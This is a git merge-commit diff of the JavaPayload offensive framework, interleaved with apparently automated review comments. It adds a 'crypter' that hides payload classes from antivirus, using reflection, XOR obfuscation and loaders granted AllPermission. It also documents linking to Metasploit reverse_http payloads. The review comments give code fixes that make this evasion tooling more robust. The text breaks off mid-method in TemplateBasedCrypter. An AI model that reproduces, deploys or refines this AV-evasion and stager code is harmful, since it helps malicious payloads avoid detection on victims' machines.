Merge branch 'svnmaster'

commit 20db88f94f853713425ccf76bd21d52477c4dee1 2 parents 6197202 + 7189ed8
Michael Schierl authored
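--- a/J2EEPayload/src/j2eepayload/builder/JTCPfwdBuilder.java
+++ b/J2EEPayload/src/j2eepayload/builder/JTCPfwdBuilder.java
@@ -39,15 +39,12 @@
 import java.io.DataInputStream;
 import java.io.DataOutputStream;
 import java.io.FileOutputStream;
+import java.io.IOException;
 import java.io.InputStream;
 import java.io.PrintStream;
 import java.net.Socket;
-import java.net.URL;
 import java.security.AllPermission;
-import java.security.CodeSource;
 import java.security.Permissions;
-import java.security.ProtectionDomain;
-import java.security.cert.Certificate;
 import java.util.ArrayList;
 import java.util.HashMap;
 import java.util.HashSet;
@@ -242,14 +239,12 @@ private String getEmbeddedClasses() {
 }
 private Map /*<String,byte[]>*/ classCache;
- private ProtectionDomain pd;
 private boolean ready;
 public void bootstrap(String[] parameters, boolean needWait) throws Exception {
 final DataInputStream in = new DataInputStream(new ByteArrayInputStream(getEmbeddedClasses().getBytes("ISO-8859-1")));
 final Permissions permissions = new Permissions();
 permissions.add(new AllPermission());
- pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
 classCache = new HashMap();
 String className;
 int length = in.readInt();
@@ -275,7 +270,11 @@ protected Class findClass(String name) throws ClassNotFoundException {
 byte[] classfile = (byte[]) classCache.get(name);
 if (classfile == null)
 return super.findClass(name);
- return defineClass(null, classfile, 0, classfile.length, pd);
+ try {
+ return define(classfile);
+ } catch (IOException ex) {
+ throw new RuntimeException(ex.toString());
+ }
 }
 public synchronized void waitReady() throws InterruptedException {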
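Review bot: In the new findClass catch block, `throw new RuntimeException(ex.toString())` discards the cause and turns a checked failure into an unchecked one although the method already declares ClassNotFoundException; `throw new ClassNotFoundException(name, ex);` keeps the stack trace and the declared contract. The bootstrap hunk removes the ProtectionDomain field but leaves `final Permissions permissions = new Permissions(); permissions.add(new AllPermission());` behind with no remaining use as far as the hunk shows, so those two lines and the AllPermission/Permissions imports the hunk keeps are now dead and can go. Both bootstrap and findClass continue outside their hunks.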
32 JavaPayload/index.html
@@ -170,7 +170,10 @@
<p>This stage expects a stager and its arguments as parameters; this stager will be
launched from the stage handler and the sockets will be connected to the stage handler's sockets,
-making it possible to connect a ReverseTCP stager directly to a JDWPTunnel stager handler.</p>
+making it possible to connect a ReverseTCP stager directly to a JDWPTunnel stager handler.</p>
+
+<p>In case you want to use one of the <tt>java/*/reverse_http*</tt> payloads from Metasploit,
+you can use the <tt>MetasploitURL</tt> stager in JavaPayload to connect to them.</p>
<h2>Changes since version 0.2</h2>
@@ -193,6 +196,8 @@
<li>Make stager and stage handlers self-documenting modules, too.</li>
<li>Add support for self-documenting Discovery modules and provide AttachDiscovery as replacement for AttachInjector's list command</li>
<li>Add javapayload.cli.Main class.</li>
+<li>Add Crypter support.</li>
+<li>Add <tt>MetasploitURL</tt> stager</li>
</ul>
<h2>Changes since version 0.1</h2>
@@ -552,5 +557,30 @@
<p><b>On the "victim" machine:</b></p>
<p><tt>rmiregistry</tt> or <tt>rmid</tt></p>
+<h3>Crypter support</h3>
+
+<p>Due to the vast amount of Java malware, antivirus has improved in
+detecting "malicious" Java classes. Therefore, it is often necessary
+to crypt the classes to avoid AV detection. Javapayload contains very
+basic crypter support that can be used to crypt standalone main classes
+as well as the results of the <tt>ClassBuilder</tt> and
+<tt>EmbeddedClassBuilder</tt> and main classes generated by other stagers
+implicitly, like by the <tt>Spawn</tt> dynstager or the
+<tt>TemplateBuilder</tt>.</p>
+
+<p>The only crypter included is called <tt>RnR</tt>, because it uses
+Reflection and Randomization to conceal the class. You may alter this
+or create your own subclasses of <tt>javapayload.crypter.Crypter</tt>
+to improve the results.</p>
+
+<p>In the <tt>ClassBuilder</tt> and the <tt>EmbeddedClassBuilder</tt>, you
+can suffix a class name with <tt>^<i>Crypter</i></tt>, like
+<tt>MyClass^RnR</tt>. Or use the <tt>CrypterBuilder</tt> to crypt a main
+class you generated earlier. To automatically crypt all classes you are
+generating (explicitly or implicitly), set the system property
+<tt>javapayload.crypter</tt> like this:</p>
+
+<p><tt>java -Djavapayload.crypter=RnR <i>...</i></tt></p>
+
</body>
</html>
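--- a/JavaPayload/src/javapayload/builder/ClassBuilder.java
+++ b/JavaPayload/src/javapayload/builder/ClassBuilder.java
@@ -39,7 +39,10 @@
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.io.UnsupportedEncodingException;
+import java.lang.reflect.Field;
+import javapayload.Module;
+import javapayload.crypter.Crypter;
 import javapayload.loader.DynLoader;
 import javapayload.stager.Stager;
@@ -54,15 +57,26 @@
 public class ClassBuilder extends Builder {
- protected static void buildClass(final String classname, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
+ protected static void buildClass(String classname, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
 final byte[] newBytecode = buildClassBytes(classname, stager, loaderClass, embeddedArgs, realArgs);
+ if (classname.indexOf('^') != -1)
+ classname = classname.substring(0, classname.indexOf('^'));
 final FileOutputStream fos = new FileOutputStream(classname + ".class");
 fos.write(newBytecode);
 fos.close();
 }
- public static byte[] buildClassBytes(final String classname, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
-
+ public static byte[] buildClassBytes(String classnameAndCrypter, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
+ final String crypter, classname, finalClassname;
+ int pos = classnameAndCrypter.indexOf('^');
+ if (pos != -1) {
+ finalClassname = classnameAndCrypter.substring(0, pos);
+ crypter = classnameAndCrypter.substring(pos+1);
+ } else {
+ finalClassname = classnameAndCrypter;
+ crypter = System.getProperty(CrypterBuilder.CRYPTER_PROPERTY);
+ }
+ classname = finalClassname + (crypter != null && crypter.length() > 0 ? "$" : "");
 final ClassWriter writerThreadCW = new ClassWriter(0);
 final ClassVisitor writerThreadVisitor = new ClassAdapter(writerThreadCW) {
@@ -225,7 +239,12 @@ public void visitOuterClass(String owner, String name, String desc) {
 }
 };
 visitClass(loaderClass, loaderVisitor, cw);
- return cw.toByteArray();
+ byte[] result = cw.toByteArray();
+ if (crypter != null && crypter.length() > 0) {
+ Crypter c = (Crypter) Module.load(Crypter.class, crypter);
+ result = c.crypt(finalClassname, result);
+ }
+ return result;
 }
 public static void main(String[] args) throws Exception {
@@ -241,7 +260,7 @@ public ClassBuilder() {
 }
 public String getParameterSyntax() {
- return "<stager> [classname]";
+ return "<stager> [<classname>[^<crypter>]]";
 }
 public void build(String[] args) throws Exception {
@@ -275,6 +294,11 @@ public static void writeClassWithoutDebugInfo(InputStream in, OutputStream out)
 public static void mainToEmbed(String[] args) throws Exception {
 ClassBuilderTemplate cb = new ClassBuilderTemplate();
+ try {
+ Field f = Class.forName("java.lang.ClassLoader").getDeclaredField("parent");
+ f.setAccessible(true);
+ f.set(cb, cb.getClass().getClassLoader());
+ } catch (Throwable t) {}
 boolean needWait = false;
 if (args[0].startsWith("+")) {
 args[0] = args[0].substring(1);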
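Review bot: The `catch (Throwable t) {}` around the reflective write to `java.lang.ClassLoader.parent` in mainToEmbed also swallows ThreadDeath and VM errors and leaves no trace when the JVM refuses the write, which is exactly the case in which a crypted wrapper will later fail with a ClassNotFoundException nobody can connect to this line. Narrow it to `catch (Exception e) { /* best effort: if the JVM refuses the write the stager keeps its default parent loader */ }` and say why the parent is replaced — as far as the hunk shows, so that the stager's delegation chain includes the loader that defined the (possibly crypted) template class. The same five lines are added to EmbeddedClassBuilder.mainToEmbed in this commit; a shared protected helper on Stager would avoid the copy. mainToEmbed continues outside the hunk.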
69 JavaPayload/src/javapayload/builder/CrypterBuilder.java
@@ -0,0 +1,69 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.builder;
+
+import java.io.ByteArrayOutputStream;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+
+import javapayload.Module;
+import javapayload.crypter.Crypter;
+import javapayload.stage.StreamForwarder;
+
+public class CrypterBuilder extends Builder {
+
+ public static final String CRYPTER_PROPERTY = "javapayload.crypter";
+
+ public CrypterBuilder() {
+ super("Crypt a standalone Class file", "");
+ }
+
+ public String getParameterSyntax() {
+ return "<inputClass> <outputClass> <crypter> | --set [<crypter>]";
+ }
+
+ public void build(String[] args) throws Exception {
+ if (args[0].equals("--set")) {
+ System.setProperty(CRYPTER_PROPERTY, args.length == 1 ? "" : args[1]);
+ } else {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ StreamForwarder.forward(new FileInputStream(args[0] + ".class"), baos);
+ FileOutputStream out = new FileOutputStream(args[1] + ".class");
+ Crypter crypter = (Crypter) Module.load(Crypter.class, args[2]);
+ out.write(crypter.crypt(args[1], baos.toByteArray()));
+ out.close();
+ }
+ }
+}
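Review bot: In build, the `FileInputStream` handed to StreamForwarder.forward is never closed (unless forward closes its source, which is not visible here) and `out` is closed only on the success path, so a failing crypter leaks the handle and leaves a partially written `<outputClass>.class` behind. The file uses no Java 7 features, so try/finally rather than try-with-resources is the fitting fix; loading the crypter and producing the bytes before opening the output also avoids creating an empty file when the crypter name is wrong. `args[2]` is also read without a length check, so unless Builder's default minimum parameter count already covers three arguments a bad invocation ends in ArrayIndexOutOfBoundsException instead of the usage line.
```java
public void build(String[] args) throws Exception {
    if (args[0].equals("--set")) {
        System.setProperty(CRYPTER_PROPERTY, args.length == 1 ? "" : args[1]);
        return;
    }
    if (args.length < 3)
        throw new IllegalArgumentException("usage: " + getParameterSyntax());
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    FileInputStream in = new FileInputStream(args[0] + ".class");
    try {
        StreamForwarder.forward(in, baos);
    } finally {
        in.close();
    }
    // resolve the crypter and crypt before touching the output file, so a bad
    // crypter name or a crypt failure leaves no empty/partial class behind
    Crypter crypter = (Crypter) Module.load(Crypter.class, args[2]);
    byte[] crypted = crypter.crypt(args[1], baos.toByteArray());
    FileOutputStream out = new FileOutputStream(args[1] + ".class");
    try {
        out.write(crypted);
    } finally {
        out.close();
    }
}
```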
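--- a/JavaPayload/src/javapayload/builder/EmbeddedClassBuilder.java
+++ b/JavaPayload/src/javapayload/builder/EmbeddedClassBuilder.java
@@ -34,6 +34,7 @@
 package javapayload.builder;
+import java.lang.reflect.Field;
 import java.util.StringTokenizer;
 import javapayload.stager.Stager;
@@ -57,7 +58,7 @@ public int getMinParameterCount() {
 }
 public String getParameterSyntax() {
- return "<classname> <stager> [stageroptions] -- <stage> [stageoptions]";
+ return "<classname>[^<crypter>] <stager> [stageroptions] -- <stage> [stageoptions]";
 }
 public void build(String[] args) throws Exception {
 ClassBuilder.buildClass(args[0], args[1], EmbeddedClassBuilderTemplate.class, buildEmbeddedArgs(args), args);
@@ -77,6 +78,11 @@ public static String buildEmbeddedArgs(String[] args) {
 public static class EmbeddedClassBuilderTemplate extends Stager {
 public static void mainToEmbed(String[] args) throws Exception {
 EmbeddedClassBuilderTemplate cb = new EmbeddedClassBuilderTemplate();
+ try {
+ Field f = Class.forName("java.lang.ClassLoader").getDeclaredField("parent");
+ f.setAccessible(true);
+ f.set(cb, cb.getClass().getClassLoader());
+ } catch (Throwable t) {}
 boolean needWait = false;
 if (args.length == 1 && args[0].equals("+")) {
 args[0] = args[0].substring(1);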
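Review bot: The five-line reflective reset of `ClassLoader.parent` added to mainToEmbed is a verbatim copy of the block ClassBuilder.mainToEmbed gains in the same commit, and both catch `Throwable` silently, so a refused write (a SecurityManager, or a JVM that rejects the reflective access) is indistinguishable from success. Since EmbeddedClassBuilderTemplate extends Stager, a single `protected static` helper on Stager — or at least on one builder — would keep the two copies in sync and give one place to narrow the catch and to explain the intent; failing that, the copy here deserves `// best effort: make this stager delegate to the loader that defined this (possibly crypted) class`. mainToEmbed continues outside the hunk.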
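--- a/JavaPayload/src/javapayload/builder/dynstager/AES.java
+++ b/JavaPayload/src/javapayload/builder/dynstager/AES.java
@@ -38,14 +38,10 @@
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.io.PrintStream;
-import java.net.URL;
 import java.security.AllPermission;
-import java.security.CodeSource;
 import java.security.MessageDigest;
 import java.security.Permissions;
-import java.security.ProtectionDomain;
 import java.security.SecureRandom;
-import java.security.cert.Certificate;
 import javapayload.handler.dynstager.SynchronizedOutputStream;
@@ -93,9 +89,8 @@ protected void bootstrapWrap(InputStream rawIn, OutputStream out, String[] param
 ci.init(Cipher.DECRYPT_MODE, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(inIV), sr);
 final Permissions permissions = new Permissions();
 permissions.add(new AllPermission());
- final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
 Class synchronizedOutputStreamClass;
- synchronizedOutputStreamClass = bootstrap(pd);
+ synchronizedOutputStreamClass = bootstrap();
 OutputStream so = (OutputStream) synchronizedOutputStreamClass.getConstructor(new Class[] { Class.forName("java.io.OutputStream") }).newInstance(new Object[] { new CipherOutputStream(out, co) });
 bootstrapOrig(new CipherInputStream(din, ci), so, newParameters);
 } catch (final Throwable t) {
@@ -119,35 +114,20 @@ public void visit(int version, int access, String name, String signature, String
 String classString = new String(cw2.toByteArray());
 // create the bootstrap method
- MethodVisitor mv = cw.visitMethod(Opcodes.ACC_PRIVATE, bootstrapName, "(Ljava/security/ProtectionDomain;)Ljava/lang/Class;", null, new String[] { "java/lang/Exception" });
+ MethodVisitor mv = cw.visitMethod(Opcodes.ACC_PRIVATE, bootstrapName, "()Ljava/lang/Class;", null, new String[] { "java/lang/Exception" });
 mv.visitCode();
+ mv.visitVarInsn(Opcodes.ALOAD, 0);
 mv.visitLdcInsn(classString);
 mv.visitLdcInsn("ISO-8859-1");
 mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/String", "getBytes", "(Ljava/lang/String;)[B");
- mv.visitVarInsn(Opcodes.ASTORE, 2);
- mv.visitVarInsn(Opcodes.ALOAD, 0);
- mv.visitInsn(Opcodes.ACONST_NULL);
- mv.visitVarInsn(Opcodes.ALOAD, 2);
- mv.visitInsn(Opcodes.ICONST_0);
- mv.visitVarInsn(Opcodes.ALOAD, 2);
- mv.visitInsn(Opcodes.ARRAYLENGTH);
- mv.visitVarInsn(Opcodes.ALOAD, 1);
- mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/ClassLoader", "defineClass", "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;");
- mv.visitVarInsn(Opcodes.ASTORE, 3);
- mv.visitVarInsn(Opcodes.ALOAD, 0);
- mv.visitVarInsn(Opcodes.ALOAD, 3);
- mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/ClassLoader", "resolveClass", "(Ljava/lang/Class;)V");
- mv.visitVarInsn(Opcodes.ALOAD, 3);
+ mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "javapayload/stager/Stager", "define", "([B)Ljava/lang/Class;");
 mv.visitInsn(Opcodes.ARETURN);
- mv.visitMaxs(6, 4);
+ mv.visitMaxs(3, 1);
 mv.visitEnd();
 }
- private Class bootstrap(ProtectionDomain pd) throws Exception {
+ private Class bootstrap() throws Exception {
 throw new IllegalStateException("This method is replaced in the final stager");
- // byte[] classfile = "TO_BE_REPLACED".getBytes("ISO-8859-1");
- // Class clazz = defineClass(null, classfile, 0, classfile.length, pd);
- // resolveClass(clazz);
- // return clazz;
+ // return define("TO_BE_REPLACED".getBytes("ISO-8859-1"));
 }
 }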
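Review bot: After dropping the explicit ProtectionDomain in bootstrapWrap, `final Permissions permissions = new Permissions(); permissions.add(new AllPermission());` at the top of that hunk feeds nothing any more — Stager.define builds its own domain — so, as far as the hunk shows, the two lines and the AllPermission/Permissions imports are dead and should be removed rather than left to suggest the permissions still matter here. The rewritten bytecode is consistent with its frame: aload_0, two ldc, getBytes, then the virtual call to Stager.define peaks at three operand-stack slots with `this` as the only local, matching `visitMaxs(3, 1)`; a one-line comment stating that stack/locals budget next to `visitMaxs` would stop the next editor from silently breaking it. bootstrapWrap continues outside the hunk.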
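--- a/JavaPayload/src/javapayload/builder/dynstager/DynStagerBuilder.java
+++ b/JavaPayload/src/javapayload/builder/dynstager/DynStagerBuilder.java
@@ -56,7 +56,7 @@
 public abstract byte[] buildStager(String stagerName, Class baseStagerClass, String extraArg, String[] args) throws Exception;
- protected void visitStringConstant(MethodVisitor mv, String constant) {
+ public static void visitStringConstant(MethodVisitor mv, String constant) {
 final List stringParts = new ArrayList();
 final int MAXLEN = 65535;
 while (constant.length() > MAXLEN || getUTFLen(constant) > MAXLEN) {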
51 JavaPayload/src/javapayload/crypter/Crypter.java
@@ -0,0 +1,51 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.crypter;
+
+import javapayload.Module;
+import javapayload.Parameter;
+
+public abstract class Crypter extends Module {
+
+ public Crypter(String summary, String description) {
+ super(null, Crypter.class, summary, description);
+ }
+
+ public final Parameter[] getParameters() {
+ throw new UnsupportedOperationException("Parameters not available for crypters");
+ }
+
+ public abstract byte[] crypt(String className, byte[] innerClassBytes) throws Exception;
+}
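Review bot: The contract of `crypt` is undocumented, and it is exactly what a third-party subclass needs: whether className is a binary name or a JVM internal name, and whether the returned bytes must define a class of that name whose static `main(String[])` defines innerClassBytes at runtime and forwards the same arguments — RnR and TemplateBasedCrypter assume both, and judging by RnR the output must also be self-contained, without references to javapayload types. Suggest a Javadoc on `crypt` stating those three points and that callers own the naming (ClassBuilder writes `finalClassname + ".class"`). `getParameters()` throwing UnsupportedOperationException will surface wherever the self-documenting module listing calls it on every Module; if that listing can reach Crypter instances, returning `new Parameter[0]` is the safer choice.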
126 JavaPayload/src/javapayload/crypter/RnR.java
@@ -0,0 +1,126 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.crypter;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.net.URL;
+import java.security.AllPermission;
+import java.security.CodeSource;
+import java.security.PermissionCollection;
+import java.security.Permissions;
+import java.security.ProtectionDomain;
+import java.security.cert.Certificate;
+import java.util.Random;
+
+public class RnR extends TemplateBasedCrypter {
+
+ public RnR() {
+ super("Reflection and Randomization", "");
+ }
+
+ protected byte[] generateReplaceData(String className, byte[] innerClassBytes, long seed) throws Exception {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+
+ // line 2
+ oos.writeObject(new Object[] { null, new Object[] { null, innerClassBytes, new Integer(0), new Integer(innerClassBytes.length), null } });
+
+ // line 3
+ oos.writeUTF("java.net.URLClassLoader");
+ oos.writeObject(new Class[] { URL[].class });
+ oos.writeObject(new Object[] { new URL[0] });
+
+ // line 4
+ oos.writeUTF("java.security.ProtectionDomain");
+ oos.writeObject(new Class[] { CodeSource.class, PermissionCollection.class });
+ final Permissions permissions = new Permissions();
+ permissions.add(new AllPermission());
+ oos.writeObject(new Object[] { new CodeSource(new URL("file:///"), new Certificate[0]), permissions });
+
+ // line 5
+ oos.writeUTF("java.lang.ClassLoader");
+
+ // line 6
+ oos.writeUTF("java.lang.Class");
+ oos.writeUTF("getDeclaredMethod");
+ oos.writeObject(new Class[] { String.class, Class[].class });
+ oos.writeObject(new Object[] { "defineClass", new Class[] { String.class, byte[].class, int.class, int.class, ProtectionDomain.class } });
+
+ // line 7
+ oos.writeUTF("java.lang.reflect.Method");
+ oos.writeUTF("setAccessible");
+ oos.writeObject(new Class[] { boolean.class });
+ oos.writeObject(new Object[] { Boolean.TRUE });
+
+ // line 8
+ oos.writeUTF("java.lang.reflect.Method");
+ oos.writeUTF("invoke");
+ oos.writeObject(new Class[] { Object.class, Object[].class });
+
+ // line 9
+ oos.writeUTF("main");
+ oos.writeObject(new Class[] { String[].class });
+
+ oos.close();
+ byte[] result = baos.toByteArray();
+ Random r = new Random(seed);
+ for (int i = 0; i < result.length; i++) {
+ result[i] ^= r.nextInt(256);
+ }
+ return result;
+ }
+
+ public static void templateMain(String[] args) throws Exception {
+ byte[] data = "TO_BE_REPLACED".getBytes("ISO-8859-1");
+ Random r = new Random(4242L);
+ for (int i = 0; i < data.length; i++) {
+ data[i] ^= r.nextInt(256);
+ }
+ // line 1:
+ ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data));
+ Object[] arx = (Object[]) in.readObject();
+ arx[0] = Class.forName(in.readUTF()).getConstructor((Class[]) in.readObject()).newInstance((Object[]) in.readObject());
+ ((Object[]) arx[1])[4] = Class.forName(in.readUTF()).getConstructor((Class[]) in.readObject()).newInstance((Object[]) in.readObject());
+ Object _ClassLoader = Class.forName(in.readUTF());
+ // line 6:
+ Object mm = Class.forName(in.readUTF()).getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(_ClassLoader, (Object[]) in.readObject());
+ Class.forName(in.readUTF()).getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(mm, (Object[]) in.readObject());
+ Class clazz = (Class) Class.forName(in.readUTF()).getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(mm, arx);
+ clazz.getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(null, new Object[] { args });
+ }
+}
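Review bot: The XOR with a `java.util.Random(seed)` stream in generateReplaceData is obfuscation, not encryption — TemplateBasedCrypter patches the seed into the wrapper as an ldc constant right next to the data, so anyone holding the class recovers the inner class, and nothing here should be read as protecting the payload. A comment on the loop should say so: `// keystream XOR only hides byte patterns from signature scanners; the seed ships in the wrapper, so this gives no confidentiality`. templateMain is also a textbook deserialization sink (ObjectInputStream over data it controls), which is safe only while the data stays embedded; a warning against ever pointing it at a network or file source would prevent an easy future mistake. It is worth stating that `java.util.Random` is specified deterministically in its Javadoc, which is why generator and wrapper agree across JVMs — SecureRandom would not.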
95 JavaPayload/src/javapayload/crypter/TemplateBasedCrypter.java
@@ -0,0 +1,95 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.crypter;
+
+import java.security.SecureRandom;
+
+import javapayload.builder.ClassBuilder;
+import javapayload.builder.dynstager.DynStagerBuilder;
+
+import org.objectweb.asm.ClassAdapter;
+import org.objectweb.asm.ClassVisitor;
+import org.objectweb.asm.ClassWriter;
+import org.objectweb.asm.FieldVisitor;
+import org.objectweb.asm.MethodAdapter;
+import org.objectweb.asm.MethodVisitor;
+
+public abstract class TemplateBasedCrypter extends Crypter {
+
+ public TemplateBasedCrypter(String summary, String description) {
+ super(summary, description);
+ }
+
+ public byte[] crypt(final String className, byte[] innerClassBytes) throws Exception {
+ final long seed = new SecureRandom().nextLong();
+ final String replaceDataString = new String(generateReplaceData(className, innerClassBytes, seed), "ISO-8859-1");
+ final ClassWriter cw = new ClassWriter(0);
+ final ClassVisitor templateVisitor = new ClassAdapter(cw) {
+
+ public void visit(int version, int access, String name, String signature, String superName, String[] interfaces) {
+ super.visit(version, access, className, null, "java/lang/Object", null);
+ }
+
+ public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) {
+ if (name.equals("templateMain")) {
